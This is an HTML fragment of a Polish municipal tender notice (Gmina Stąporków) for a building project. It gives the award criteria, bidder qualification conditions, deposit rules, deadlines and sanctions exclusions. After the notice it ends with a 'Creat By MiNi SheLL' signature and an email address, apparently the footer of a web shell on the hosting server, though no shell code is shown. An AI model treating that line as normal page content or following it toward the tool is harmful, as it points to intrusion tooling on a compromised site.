class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze oferty Zamawiający będzie kierował się niżej wskazanymi kryteriami:<br/>Cena (C) - 60 pkt<br/>Okres gwarancji (G) - 20 pkt<br/>Doświadczenie kierownika budowy (D) - 20 pkt</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji (G)</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie kierownika budowy (D)</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. O udzielenie zamówienia mogą się ubiegać Wykonawcy, którzy nie podlegają wykluczeniu z postępowania na podstawie art. 108 ust. 1, a także art. 109 ust. 1 pkt 4), 5) oraz 7) ustawy Pzp oraz spełniają warunki określone w art. 112 ustawy Pzp dotyczące:<br/>1.1. Zdolności do występowania w obrocie gospodarczym.<br/>Zamawiający nie stawia warunku odnośnie zdolności Wykonawcy do występowania w obrocie gospodarczym.<br/>1.2. Uprawnień do prowadzenia w danym zakresie określonej działalności gospodarczej lub zawodowej, o ile wynika to z<br/>odrębnych przepisów.<br/>Zamawiający nie precyzuje w tym zakresie żadnych wymagań.<br/>1.3. Sytuacji ekonomicznej lub finansowej.<br/>Wykonawca spełni warunek udziału w postępowaniu dotyczący sytuacji ekonomicznej lub finansowej jeżeli wykaże, że:<br/>a) posiada na rachunku bankowym lub spółdzielczej kasy oszczędnościowo-kredytowej środki finansowe lub zdolność<br/>kredytową w wysokości nie mniejszej niż 1 000 000,00 PLN,<br/>b) jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę gwarancyjną w wysokości 1 000 000,00 PLN.<br/>1.4. Zdolności technicznej lub zawodowej.<br/>Wykonawca spełni warunek udziału w postępowaniu dotyczący zdolności zawodowej, jeżeli wykaże, że:<br/>a) w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, zrealizował nie mniej niż 3 zadania polegające na wykonaniu robót budowlanych w zakresie budowy/przebudowy/rozbudowy budynku użyteczności publicznej* o kubaturze nie mniejszej niż 1000 m³ obejmującej<br/>zakresem montaż odnawialnych źródeł energii (tj. pompa ciepła lub instalacja fotowoltaiczna) (wykonanej w ramach jednej<br/>umowy z Inwestorem).<br/>* budynku użyteczności publicznej - należy przez to rozumieć budynek przeznaczony na potrzeby administracji publicznej, wymiaru sprawiedliwości, kultury, kultu religijnego, oświaty, szkolnictwa wyższego, nauki, wychowania, opieki zdrowotnej,<br/>społecznej lub socjalnej, obsługi bankowej, handlu, gastronomii, usług, w tym usług pocztowych lub telekomunikacyjnych, turystyki, sportu, obsługi pasażerów w transporcie kolejowym, drogowym, lotniczym, morskim lub wodnym śródlądowym, oraz inny budynek przeznaczony do wykonywania podobnych funkcji; za budynek użyteczności publicznej uznaje się także budynek biurowy lub socjalny<br/>b) że dysponuje lub będzie dysponować w okresie przewidzianym na realizację zamówienia osobami legitymującymi się kwalifikacjami zawodowymi oraz doświadczeniem odpowiednio do objęcia funkcji, jakie zostaną im powierzone tj.:<br/>- Kierownikiem budowy - 1 osoba posiadająca uprawnienia budowlane do kierowania budową i robotami budowlanymi w<br/>specjalności konstrukcyjno-budowlanymi bez ograniczeń, posiadająca doświadczenie zawodowe jako inspektor nadzoru lub<br/>kierownik budowy/robót, przy realizacji minimum jednej inwestycji (od rozpoczęcia do zakończenia) polegającej na budowie/przebudowie/rozbudowie budynku o kubaturze nie mniejszej niż 1000 m³<br/>- Kierownikiem robót sanitarnych - 1 osoba posiadającym uprawnienia budowlane do kierowania robotami w specjalności<br/>instalacyjnej, w zakresie instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych,<br/>- Kierownikiem robót elektrycznych - 1 osoba posiadającym uprawnienia budowlane do kierowania robotami w specjalności<br/>instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych.<br/>Wskazana osoba powinna posiadać wymagane uprawnienia budowlane i przynależeć do właściwej izby samorządu zawodowego, jeżeli taki wymóg nakłada na nią ustawa Prawo budowlane. Zgodnie z art. 12a Prawa budowlanego, który to<br/>odsyła do ustawy z dnia 18 marca 2008 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz. U. z 2020 r. poz. 220 przynależność do właściwej izby samorządu zawodowego nie jest wymagana od obywateli państw członkowskich Unii Europejskiej, Konfederacji Szwajcarskiej lub państw członkowskich Europejskiego Porozumienia o Wolnym Handlu (EFTA) gdyż do posiadania uprawnień w wykonywaniu samodzielnych funkcji w budownictwie nie jest wymagana przynależności do izby samorządu zawodowego. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">3.1. informacji banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, w okresie nie wcześniejszym niż 3 miesiące przed jej złożeniem;<br/>3.2. dokumentów potwierdzających, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej<br/>działalności związanej z przedmiotem zamówienia ze wskazaniem sumy gwarancyjnej tego ubezpieczenia<br/>3.3. wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest<br/>krótszy – w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te<br/>zostały wykonane, oraz załączeniem dowodów określających, czy te roboty budowlane zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – inne odpowiednie dokumenty; – załącznik nr 8 do SWZ,<br/>3.4. wykaz osób skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za<br/>świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu<br/>wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami; – załącznik nr 9 do SWZ,</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Dokument potwierdzający umocowanie do reprezentowania<br/>Pełnomocnictwo - jeżeli dotyczy<br/>Zobowiązanie podmiotu trzeciego - jeżeli dotyczy<br/>Potwierdzenie doświadczenia kierownika budowy <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1. Zamawiający wymaga wniesienia wadium w kwocie 10 000,00 PLN (słownie: dziesięć tysięcy i 00/100 PLN)<br/>2. Wadium wnosi się przed upływem terminu składania ofert i utrzymuje nieprzerwanie do dnia upływu terminu związania<br/>ofertą, z wyjątkiem przypadków, o których mowa w art. 98 ust.1 pkt 2 i 3 oraz ust. 2 ustawy Pzp.<br/>3. Wadium może być wnoszone w jednej lub kilku następujących formach:<br/>a. pieniądzu;<br/>b. gwarancjach bankowych;<br/>c. gwarancjach ubezpieczeniowych;<br/>d. poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o<br/>utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U. z 2020 r. poz. 299).<br/>4. Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy wskazany przez Zamawiającego.<br/>W przypadku wyboru pieniężnej formy, wadium należy wpłacić przelewem na rachunek bankowy:<br/>48 1020 2629 0000 9302 0201 3639, z dopiskiem: Wadium Gmina Stąporków znak sprawy ZP.271.11.2022/RS<br/>5. Wadium wniesione w pieniądzu musi wpłynąć na wskazany rachunek bankowy zamawiającego najpóźniej przed upływem<br/>terminu składania ofert (decyduje data wpływu na rachunek bankowy zamawiającego).<br/>6. Jeżeli wadium jest wnoszone w formie gwarancji lub poręczenia, Wykonawca przekazuje Zamawiającemu oryginał<br/>gwarancji lub poręczenia, w postaci elektronicznej.<br/>7. Wadium musi obejmować okres związania ofertą, który wynosi 30 dni.<br/>8. W przypadku, gdy wykonawca nie wniósł wadium lub wniósł w sposób nieprawidłowy lub nie utrzymywał wadium<br/>nieprzerwanie do upływu terminu związania ofertą lub złożył wniosek o zwrot wadium, w przypadku o którym mowa w art. 98<br/>ust. 2 pkt 3 ustawy Pzp, Zamawiający odrzuci ofertę na podstawie art. 226 ust. 1 pkt 14 ustawy Pzp.<br/>9. Zamawiający dokona zwrotu wadium zgodnie z zapisami art. 98 ustawy Pzp.<br/>10. Zamawiający zatrzymuje wadium wraz z odsetkami na podstawie art. 98 ust. 6 ustawy Pzp. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1 Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia.<br/>1.1. w takim przypadku:<br/>- Wykonawcy występujący wspólnie są zobowiązani do ustanowienia pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania ich w postępowaniu i zawarcia umowy w sprawie przedmiotowego zamówienia publicznego,<br/>-wszelka korespondencja będzie prowadzona przez Zamawiającego wyłącznie z pełnomocnikiem,<br/>- żaden z nich nie może podlegać wykluczeniu na podstawie art. 108 ust. 1 ustawy Pzp, oraz w przypadkach, o których mowa w rozdz. VII pkt 2, natomiast spełnianie warunków udziału w postępowaniu Wykonawcy wykazują zgodnie z wymogami opisanymi w rozdz. VI pkt. 1.<br/>- oświadczenie, o którym mowa w rozdz. VIII pkt 1 ppkt. 1.2 składa każdy z Wykonawców wspólnie ubiegających się o zamówienie. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w postępowaniu w zakresie, w jakim każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>2. W przypadku, gdy spełnienie warunku opisanego:<br/>1) w rozdz. VI pkt 1 ppkt. 1.4 wykazuje co najmniej jeden z Wykonawców wspólnie ubiegających się o udzielenie zamówienia,<br/>2) w rozdz. VI pkt 1 ppkt. 1.4 Wykonawcy wykazują poprzez poleganie na zdolnościach tych z Wykonawców, którzy wykonają roboty budowlane lub usługi, do realizacji których te zdolności są wymagane, Wykonawcy wspólnie ubiegający się o udzielenie zamówienia, zgodnie z art. 117 pkt. 4 Ustawy Pzp zobligowani są do złożenia wraz z ofertą oświadczenia, z którego wynika, które roboty budowlane, dostawy lub usługi wykonają poszczególni Wykonawcy <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> ze względu na ograniczoną ilość znaków w przedmiotowym polu Zamawiający informuje, że rodzaj i zakres zmian umowy oraz warunków ich wprowadzania dostępny jest na stronie internetowej prowadzonego postępowania z załączniku nr 5 do SWZ - tj. projektowanych postanowieniach umownych <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-11-14 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę należy złożyć poprzez system https://miniportal.uzp.gov.pl poprzez Formularz do komunikacji - &gt; Formularz do złożenia, zmiany, wycofania oferty lub wniosku” dostępnych na platformie ePUAP (system miniportal.gov.pl po wybraniu formularzu do komunikacji automatycznie przekierowuje na platformę ePUAP)</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-11-14 10:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-12-13</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1.	Na podstawie art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. w celu przeciwdziałania wspieraniu agresji Federacji Rosyjskiej na Ukrainę rozpoczętej w dniu 24 lutego 2022 r. (Dz. U. z 2022 r. poz. 835), zwana dalej „ustawą sankcyjną” z postępowania o udzielenie zamówienia publicznego wyklucza się:<br/>- wykonawcę oraz uczestnika konkursu wymienionego w wykazach określonych w rozporządzeniu 765/2006 i rozporządzeniu 269/2014 albo wpisanego na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu środka, o którym mowa w art. 1 pkt. 3 ustawy sankcyjnej;<br/>- wykonawcę oraz uczestnika konkursu, którego beneficjentem rzeczywistym w rozumieniu ustawy z dnia 1 marca 2018 r. o przeciwdziałaniu praniu pieniędzy oraz finansowaniu terroryzmu (Dz. U. z 2022 r. poz. 593 i 655) jest osoba wymieniona w wykazach określonych w rozporządzeniu 765/2006 i rozporządzeniu 269/2014 albo wpisana na listę lub będąca takim beneficjentem rzeczywistym od dnia 24 lutego 2022 r., o ile została wpisana na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu środka, o którym mowa w art. 1 pkt. 3 ustawy sankcyjnej; <br/>- wykonawcę oraz uczestnika konkursu, którego jednostką dominującą w rozumieniu art. 3 ust. 1 pkt. 37 ustawy z dnia 29 września 1994 r. o rachunkowości (Dz. U. z 2021 r. poz. 217, 2105 i 2106), jest podmiot wymieniony w wykazach określonych w rozporządzeniu 765/2006 i rozporządzeniu 269/2014 albo wpisany na listę lub będący taką jednostką dominującą od dnia 24 lutego 2022 r., o ile został wpisany na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu środka, o którym mowa w art. 1 pkt. 3 ustawy sankcyjnej.<br/>2.	W celu potwierdzenia braku istnienia okoliczności, o których mowa w pkt 1 Zamawiający zastrzega możliwość samodzielnego badania ogólnodostępnych rejestrów, w tym Centralnej Ewidencji i Informacji o Działalności Gospodarczej, Krajowego Rejestru Sądowego oraz Centralnego Rejestru Beneficjentów Rzeczywistych.

Creat By MiNi SheLL
Email: jattceo@gmail.com